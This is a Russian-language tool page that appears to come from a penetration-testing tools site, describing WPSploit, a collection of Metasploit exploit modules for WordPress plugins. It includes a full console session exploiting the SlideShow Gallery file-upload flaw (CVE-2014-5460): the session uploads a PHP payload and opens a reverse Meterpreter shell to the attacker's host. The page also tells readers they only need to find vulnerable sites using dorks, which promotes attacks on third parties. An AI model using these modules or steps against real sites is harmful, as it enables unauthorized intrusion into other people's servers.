WPSploit
Описание WPSploit
WPSploit - это дополнительные модули для эксплуатации уязвимостей WordPress с помощью Metasploit.
Назначение этого репозитория — создание и/или портирование эксплойтов под WordPress, в качестве инструмента эксплуатации используется привычный многим Metasploit.
На данный момент имеется 39 модулей (14 эксплойтов и 25 вспомогательных, которые, как правило, проводят разнообразные сканирования/анализ имеющихся уязвимостей).
Все модули созданы с использованием информации базы данных уязвимостей WPScan. Нужно понимать, что главное отличие этих модулей от названной базы данных в том, что это не просто описания уязвимостей, а готовый эксплойты. Вам только нужно найти уязвимые сайты (по доркам или по собственным базам).
Домашняя страница: https://github.com/espreto/wpsploit
Справка по WPSploit
Документация по всем модулям расположена по этому адресу: https://github.com/espreto/wpsploit/tree/master/documentation. Обратите внимание на неё, поскольку в ней даны подробные описания каждого модуля, включающие имеющиеся уязвимости (полезно для поиска уязвимых сайтов), даны примеры использования.
Посмотреть на список модулей можете здесь: https://github.com/espreto/wpsploit/tree/master/modules
Руководство по WPSploit
Страница man отсутствует.
Примеры запуска WPSploit
Эксплойты из WPSploit можно использовать с помощью Metasploit. Т.е. нам нужно запустить Metasploit. Делается это так:
Далее показан пример работы с одним из эксплойтов:
msf > use exploit/unix/webapp/wp_slideshowgallery_upload msf exploit(wp_slideshowgallery_upload) > show options Module options (exploit/unix/webapp/wp_slideshowgallery_upload): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD yes Valid password for the provided username Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST yes The target address RPORT 80 yes The target port TARGETURI / yes The base path to the wordpress application USER yes A valid username VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 WP SlideShow Gallery 1.4.6 msf exploit(wp_slideshowgallery_upload) > info Name: WordPress SlideShow Gallery Authenticated File Upload Module: exploit/unix/webapp/wp_slideshowgallery_upload Platform: PHP Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2014-08-28 Provided by: Jesus Ramirez Pichardo Roberto Soares Espreto Available targets: Id Name -- ---- 0 WP SlideShow Gallery 1.4.6 Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD yes Valid password for the provided username Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST yes The target address RPORT 80 yes The target port TARGETURI / yes The base path to the wordpress application USER yes A valid username VHOST no HTTP server virtual host Payload information: Description: The WordPress SlideShow Gallery plugin contains an auhtenticated file upload vulnerability. We can upload arbitrary files to the upload folder, because the plugin uses it's own file upload mechanism instead of the wordpress api it's possible to upload any file type. The user provided does not need special rights, and users with "Contributor" role can be abused. References: http://cvedetails.com/cve/2014-5460/ http://www.exploit-db.com/exploits/34681/ msf exploit(wp_slideshowgallery_upload) > set RHOST 192.168.1.31 RHOST => 192.168.1.31 msf exploit(wp_slideshowgallery_upload) > set USER espreto USER => espreto msf exploit(wp_slideshowgallery_upload) > set PASSWORD xxxxxxx PASSWORD => dvd43145 msf exploit(wp_slideshowgallery_upload) > exploit [*] Started reverse handler on 192.168.1.46:4444 [*] 192.168.1.31:80 - Trying to login as espreto [*] 192.168.1.31:80 - Trying to upload payload [*] 192.168.1.31:80 - Uploading payload [*] 192.168.1.31:80 - Calling uploaded file tfyteogt.php [*] Sending stage (40499 bytes) to 192.168.1.31 [*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.31:40298) at 2015-04-13 03:46:36 -0300 [+] Deleted tfyteogt.php meterpreter > sysinfo Computer : msfdevel OS : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686 Meterpreter : php/php meterpreter >
Установка WPSploit
Установка в Kali Linux
Подразумевается, что Metasploit у вас уже установлен. Далее делаете так:
cd ~/.msf4/modules/ git clone https://github.com/espreto/wpsploit.git
Информация об установке в другие операционные системы будет добавлена позже.
Скриншоты WPSploit
Это утилита командной строки.
Инструкции по WPSploit
Ссылки на инструкции будут добавлены позже.
Comments are Closed